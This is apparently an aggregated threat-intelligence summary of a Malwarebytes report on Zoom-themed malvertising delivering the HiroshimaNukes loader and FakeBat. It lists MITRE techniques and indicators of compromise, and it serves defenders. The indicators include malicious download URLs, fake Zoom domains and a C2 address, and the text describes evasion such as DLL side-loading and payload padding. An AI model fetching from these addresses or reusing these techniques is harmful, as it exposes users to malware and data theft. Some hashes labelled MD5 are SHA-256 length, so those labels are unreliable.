Threat Research

Malvertisers zoom in on cryptocurrencies and initial access | Malwarebytes

Securonix

Malvertising campaigns exploiting Google searches for Zoom have grown, redirecting victims to fake Zoom pages and malicious installers. The article highlights two cases—HiroshimaNukes and FakeBat with Hunting panel 1.40—showing loaders and data-stealing payloads delivered through cloaked redirects and DLL side-loading. #HiroshimaNukes #FakeBat #HuntingPanel140 #AppsFlyer #HYROS #Zoom #ZoomInstaller

Keypoints

  • The number and prominence of Zoom-related malvertising campaigns have increased, targeting both individuals and corporate users.
  • Candidates are redirected via cloaked Google ads and tracking templates to either legitimate or fake Zoom sites before download.
  • Case #1 introduces HiroshimaNukes, a loader that uses DLL side-loading to drop a data-stealing payload and perform exfiltration.
  • Case #2 introduces FakeBat with a new “Hunting panel 1.40” to track malvertising campaigns and use PowerShell/MSIX-based delivery.
  • The main Zoom installer shown to victims is a legitimate signed binary, while malicious DLLs and a large padded payload enable stealthy execution.
  • Attackers rely on ad accounts (sometimes compromised) and fake identities to run large numbers of malicious Zoom ads.

MITRE Techniques

  • [T1189] Drive-by Compromise – The threat actor is targeting users via Google ads related to a search for zoom. ‘The threat actor is targeting users via Google ads related to a search for zoom’
  • [T1204] User Execution – Users are tricked into downloading a file called ZoomInstaller.zip. ‘Users are tricked into downloading a file called ZoomInstaller.zip’
  • [T1574.001] DLL Search Order Hijacking – _Zoom.exe side-loads librcrypto-3-zm.dll; DLL side-loading used to bypass detection. ‘The _Zoom.exe side-loads librcrypto-3-zm.dll’
  • [T1036] Masquerading – Main executable is a legitimate binary signed by Zoom Video Communications, Inc. ‘The _Zoom.exe file is a legitimate binary signed by Zoom Video Communications, Inc’
  • [T1027] Obfuscated/Compressed Files and Information – Payload inflated with junk code to evade detection. ‘Dropped file over 774 MB… The file has been inflated with junk code’
  • [T1059.001] PowerShell – Base64-encoded PowerShell reveals the malware’s command and control server and telemetry commands. ‘The Base64-encoded PowerShell reveals the malware’s command and control server as well as a number of other commands such as reporting telemetry back about the machine and any security software installed’
  • [T1105] Ingress Tool Transfer – Download process initiated via a JavaScript event linking to the MSIX file hosted. ‘The download process is initiated via a JavaScript event linking to the MSIX file is hosted’
  • [T1082] System Information Discovery – Telemetry on machine and installed security software. ‘reporting telemetry back about the machine and any security software installed’
  • [T1041] Exfiltration – Data theft via stealer payload and data exfiltration. ‘data exfiltration’
  • [T1071.001] Web Protocols – C2 and command-and-control server communications. ‘a number of other commands such as reporting telemetry back about the machine and any security software installed’

Indicators of Compromise

  • [Domain] zoom-us.tech – Fake Zoom site used in Case #1
  • [URL] zoom-us.tech/ZoomInstaller.zip – Download URL for Case #1
  • [File hash] fd524641d2be705d76feb0453374c5b2ad9582ced4f00bb3722b735401da2762 – Fake Zoom installer archive MD5
  • [File hash] 30fda67726f77706955f6b52b202452e91d5ff132783854eec63e809061a4b5c – Malicious DLL (libcrypto-3-zm.dll)
  • [File hash] 5b917d04d416cafaf13ed51c40b58dc8b4413483ea3f5406b8348038125cad0b – Stealer payload
  • [IP] 94.131.110.127 – Case #1 C2
  • [Domain] z00nn.one-platform-to-connect.group – Case #2 fake Zoom site
  • [Domain] info-zoomapp.com – Case #2 fake Zoom site
  • [Domain] zoomnewsonly.site – Case #2 fake Zoom site
  • [Domain] zoonn.virtual-meetings.cn.com – Case #2 fake Zoom site
  • [Domain] promoapp-zoom.com – Case #2 fake Zoom site
  • [URL] youstorys.com/fonts/Zoom-x64.msix – Case #2 download URL
  • [URL] windows-rars.shop/bootstrap/Zoom-x64.msix – Case #2 download URL
  • [URL] scheta.site/apps.store/ZoomInstaller.msix – Case #2 download URL
  • [File hash] dcb80bd21bd6900fe87423d3fb0c49d8f140d5cf5d81b662cd74c22fca622893 – Installer (Zoom-x64.msix) MD5
  • [File hash] 44cac5bf0bab56b0840bd1c7b95f9c7f5078ff417705eeaaf5ea5a2167a81dd5 – Installer (ZoomInstaller.msix) MD5
  • [File hash] 462df2e4a633e57de0d5148060543576d7c1165bf90e6aec4183f430d8925a1c – Installer (Zoom-x64.msix) or related payload
  • [URL] winkos.net/ld/zm.tar.gpg – Encrypted payload URL (Case #2)
  • [Domain] 2311foreign.xyz – Fake Bat C2

Read more: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/malvertisers-zoom-in-on-cryptocurrencies-and-initial-access

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint